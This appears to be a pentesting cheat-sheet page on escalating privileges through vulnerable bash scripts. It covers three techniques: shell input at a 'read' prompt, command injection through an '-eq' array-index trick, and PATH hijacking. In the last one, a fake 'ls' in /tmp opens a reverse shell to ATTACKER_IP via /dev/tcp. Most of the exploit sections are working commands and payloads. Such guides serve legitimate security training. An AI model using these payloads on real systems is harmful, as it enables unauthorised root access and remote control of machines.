# Bash ## Theory Bash scripting is a powerful tool used by system administrators and developers to automate tasks and streamline processes on Unix-like systems. However, like any software, bash scripts can be vulnerable to various security issues, which, if exploited, can lead to privilege escalation and unauthorized access. ## Practice ### Shell In Prompt {% tabs %} {% tab title="Enumerate" %} If a bash script executes `read -p`. We can input `/bin/bash -i` to get a shell as another user. ```bash $ cat /usr/bin/vuln-script.sh #!/bin/bash read -p "What's you name: " ``` {% endtab %} {% tab title="Exploit" %} We can input `/bin/bash -i` to get a shell. ```bash $ sudo /usr/bin/sudo-script.sh What's you name: /bin/bash -i ``` {% endtab %} {% endtabs %} ### Bash eq {% tabs %} {% tab title="Enumerate" %} If a bash script use the `-eq` comaparison, it's vulnerable to arbitrary command execution. ```bash $ cat /usr/bin/vuln-script.sh #!/bin/bash read -rp "Enter guess: " num if [[ $num -eq 42 ]] then echo "Correct" else echo "Wrong" fi ``` {% endtab %} {% tab title="Exploit" %} To execute arbitrary command, answer this question as below. We have to Inject arbitrary command before the correct number (42). ```bash sudo /bin/bash /opt/example.sh Enter guess: a[$(/bin/bash -p >&2)]+42 #Or execute your own malicious script sudo /bin/bash /opt/example.sh Enter guess: a[$(/tmp/shell.elf)]+42 ``` {% hint style="info" %} `a[$(/tmp/shell.elf)]` will allow us, by evaluating the content of the array, to execute our script {% endhint %} {% endtab %} {% endtabs %} ### No Command Path Exploit {% tabs %} {% tab title="Enumerate" %} If a bash script executes another command **without specifying the path.** We can abuse it and get a privilege escalation. ```bash $ cat /usr/bin/vuln-suid-script.sh #!/bin/bash ls /root/var/file ``` {% endtab %} {% tab title="Exploit" %} We can generate a malicious file in the `/tmp` folder named as the command called without full path ```bash #Generate a payload echo "bash -c '/bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" > /tmp/ls chmod +x /tmp/ls #Change Path env variable export PATH=/tmp:$PATH #Execute the suid script /usr/bin/vuln-suid-script.sh ``` {% endtab %} {% endtabs %}